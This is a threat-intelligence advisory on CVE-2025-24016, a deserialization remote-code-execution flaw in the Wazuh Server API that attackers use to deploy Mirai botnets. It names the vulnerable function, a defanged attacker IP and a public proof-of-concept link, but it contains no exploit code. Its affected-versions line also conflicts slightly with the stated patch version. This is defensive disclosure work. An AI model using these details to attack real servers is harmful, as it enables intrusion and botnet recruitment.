Full Report
A now-patched critical security flaw in the Wazur Server is being exploited by threat actors to drop two different Mirai botnet variants and use them to conduct distributed denial-of-service (DDoS) attacks. Akamai, which first discovered the exploitation efforts in late March 2025, said the malicious campaign targets CVE-2025-24016 (CVSS score: 9.9), an unsafe deserialization vulnerability that
Analysis Summary
# Vulnerability: Critical Unsafe Deserialization RCE in Wazuh Server
## CVE Details
- CVE ID: CVE-2025-24016
- CVSS Score: 9.9 (Critical)
- CWE: Unsafe Deserialization
## Affected Systems
- Products: Wazuh Server
- Versions: All versions of the server software including and above 4.4.0.
- Configurations: N/A (Affects API deserialization process)
## Vulnerability Description
This vulnerability is an unsafe deserialization flaw residing in the Wazuh API. Parameters within the `DistributedAPI` are serialized as JSON and subsequently deserialized using the "as_wazuh_object" function located in `framework/wazuh/core/cluster/common.py`. A remote threat actor can exploit this by injecting malicious JSON payloads, leading to remote code execution (RCE) in arbitrary Python code on the underlying Wazuh server.
## Exploitation
- Status: Exploited in the wild
- Complexity: Low (Given the PoC availability and RCE nature)
- Attack Vector: Network
## Impact
- Confidentiality: High (RCE allows full system compromise)
- Integrity: High (RCE allows arbitrary code execution)
- Availability: High (Exploited to deploy Mirai botnet components)
## Remediation
### Patches
- Wazuh Server version 4.9.1 (Released February 2025)
### Workarounds
- No specific vendor workarounds were explicitly detailed, but immediate patching is advised due to active exploitation. Potential perimeter controls (e.g., WAF rules) might offer temporary relief by inspecting incoming API traffic for suspicious JSON structures.
## Detection
- Indicators of compromise include external shell script execution originating from the Wazuh server process, attempting to download files (specifically Mirai botnet variants like LZRD or Resbot) from known attacker IPs (e.g., 176.65.134[.]62).
- Detection methods should focus on monitoring API endpoints for unusual JSON payload sizes or structures, and monitoring the Wazuh process for unauthorized outbound connections, shell script execution, or the presence of known Mirai binaries.
## References
- Vendor Advisory (Wazuh): hxxps://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
- Public PoC: hxxps://github.com/MuhammadWaseem29/CVE-2025-24016
- Akamai Report: hxxps://www.akamai.com/blog/security-research/botnets-flaw-mirai-spreads-through-wazuh-vulnerability